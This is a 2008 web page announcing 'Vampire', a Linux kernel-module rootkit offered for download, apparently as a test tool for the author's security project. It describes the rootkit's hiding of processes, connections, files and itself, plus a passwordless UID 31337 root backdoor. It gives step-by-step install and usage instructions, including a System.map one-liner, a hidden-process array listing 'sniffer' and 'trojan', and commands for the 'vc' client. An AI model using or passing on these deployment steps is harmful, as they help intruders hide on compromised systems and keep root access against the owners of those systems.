Vampire
Submitted by Bitlackeys on Wed, 05/21/2008 - 12:19
Author: Ryan J. O'Neill - Ryan@bitlackeys.com
News: Vampire 0.2 is available for download here!
-[About]-
Vampire is a Loadable kernel module rootkit for the Linux 2.6 kernel. It is less then elegant code, and quickly designed
as a means to commence, and test a security project that I am working called Ktraq.
Vampire includes the following features, all very common to previous LKM rootkits:
- Process hiding: Any number of processes that you want to be hidden become invisible to /proc
- Network session hiding: Any services, or session of any type that you want hidden are invisible to netstat
- File hiding: Files that you want hidden become invisible, and cannot be opened.
- Directory privacy: Your directories cannot be accessed, and appear not to exist
- Root backdoor: Logging in as special user with UID 31337 drops you to uid 0
- Vampire hides itself from /proc/modules
- Special user with UID 31337 can see and access the files that are hidden through the vampire client,
which is a program that manipulates the hacked version of setuid to allow you to execute commands as the special user.
- Special user cannot be seen in /etc/passwd
-[Installation]-
In order to effectively use this rootkit, it needs to know the address of the sys_call_table
because it is no longer exported in the 2.6 kernel. I have decided to leave this up to the user,
as it is very easy to find it in /boot/System.map, and the method in which automatically locates
the sys_call_table has not always been reliable for me. Make sure that you grep for it in the correct
System.map file (meaning the kernel version you are running). This will get them all...
cat /boot/*ystem*.map* | grep sys_call_table | awk -F ' ' '{print $1}'
Open up vampire.c, and assign the address to 'unsigned long sc_address'
'unsigned long sc_address = 0xc03544e0;'While your in vampire.c, customize the arrays so that they contain the files, processes, and service that you want hidden. It is very self explanatory.
const char *p_array[] =
#define P_COUNT 2 /* number of hidden processes */
{ "sniffer", "trojan", "NULL" };
Make sure to leave the string that says NULL, but don't count it as a process. This is lazy programming,
and if I feel like it i'll add a feature to the client that allows you to add them on the fly. You may
add as many elements as you like.
To install the rootkit, just use the install script. This will compile the code, create the non-passworded special
user account, and insert the module. Un-install will do the opposite =)
After the rootkit is installed, keep in mind that you can see, and access the elements that are otherwise hidden
with the special UID 31337. This will _only_ work if you use the 'vc' program to execute commands. Logging in
or switching to user elite, will only drop you to a root shell. To employ the benefits of that user, you must
use the following syntax: ./vc +cmd 31337 (command)
For example, this is the only way that you can tell the rootkit is installed
# ./vc +cmd 31337 lsmod | grep vampireThat's basically it. It's worth noting that some newer Linux use setuid32(), and some don't. If you get compile errors about setuid32(), then comment out the system call hooking, and unhooking of that function. Vampire has implemented both versions, so no worries. See the README for more details on this. This rootkit is part of a much larger security project that is in early development, and be expected soon.
